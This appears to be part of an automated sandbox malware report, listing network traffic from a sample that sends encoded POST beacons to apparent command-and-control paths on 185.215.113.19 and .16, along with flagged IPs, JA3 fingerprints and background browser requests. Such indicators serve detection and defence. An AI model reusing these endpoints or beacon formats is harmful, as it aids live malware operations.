Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 42 41 31 34 33 43 39 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FBA143C9FCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 31 32 38 37 35 42 33 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A77B12875B35E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View IP Address: 13.107.246.40 13.107.246.40
Source: Joe Sandbox View IP Address: 85.28.47.31 85.28.47.31
Source: Joe Sandbox View IP Address: 162.159.61.3 162.159.61.3
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GES-ASRU GES-ASRU
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox View JA3 fingerprint: fb0aa01abe9d8e4037eb3473ca6e2dca
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.31
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle, 0_2_00405000
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1p5G+81pvP7punU&MD=N3O13Xaa HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=1p5G+81pvP7punU&MD=N3O13Xaa HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /crx/blobs/AVsOOGgL4EVsLTMzZa-C0yXaDVW5z6pCjWzx7YKwHb9PR6v117H2hbsZgQ2S3VrQetSMoK86b9iY-_-8nYIxIJD4BasJl9SD8IoqvPIbEK9wBlfqTusC6rL6yTYDfaVSn9sAxlKa5bRpPaxsFjcmEK7Nec5bVL7NZYhc/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_80_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /s/googlesans/v58/4UaRrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iq2vgCI.woff2 HTTP/1.1Host: fonts.gstatic.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"Origin: https://accounts.google.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1722622217&P2=404&P3=2&P4=HRMAGmFP8EnBZRt3MBzrWkGoEL886HyLUTisCaE9WLiFCc98%2b6UZVpkmckHSlQ4wxX7sFV9VZU%2fvGxngRqL8XA%3d%3d HTTP/1.1Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.comConnection: keep-aliveMS-CV: CsGSn4HudrHHhUu1O19xTfSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /v4/api/selection?placement=88000360&nct=1&fmt=json&ADEFAB=1&OPSYS=WIN10&locale=en-GB&country=CH&edgeid=6686581979505309747&ACHANNEL=4&ABUILD=117.0.5938.132&poptin=0&devosver=10.0.19045.2006&clr=esdk&UITHEME=light&EPCON=0&AMAJOR=117&AMINOR=0&ABLD=5938&APATCH=132 HTTP/1.1Host: arc.msn.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=-812259498&timestamp=1722017421427 HTTP/1.1Host: accounts.youtube.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-arch: "x86"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-bitness: "64"sec-ch-ua-wow64: ?0sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132", "Google Chrome";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/domains_config_gz/2.8.75/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.47Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ShorelineSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/product_category_en/1.0.0/asset?assetgroup=ProductCategories HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: ProductCategoriesSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlKHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://accounts.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=516=R6AXCkxUWuMyNXOsPODa58uOz3LBr7nLToGxfNvZ-cTlF0LvjEvbcKbAeCBEZ8QkXibOrtvgVPvtONOSimFG9HyXTv-XoLELcdl8mDhS8ofmMDtz0lqoA0RDhfNvbpCE3cKWL6xjAgdQjyKK5qU_93K62ar43IvGBMafQZLj4ok
Source: global traffic HTTP traffic detected: GET /account HTTP/1.1Host: www.youtube.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=953913297&timestamp=1722017443046 HTTP/1.1Host: accounts.youtube.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: https://accounts.google.com/Connection: keep-aliveUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: iframeSec-Fetch-Mode: navigateSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.google.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: https://accounts.google.com/Connection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: no-corsSec-Fetch-Site: same-site
Source: global traffic HTTP traffic detected: GET /v1/tiles HTTP/1.1Host: contile.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
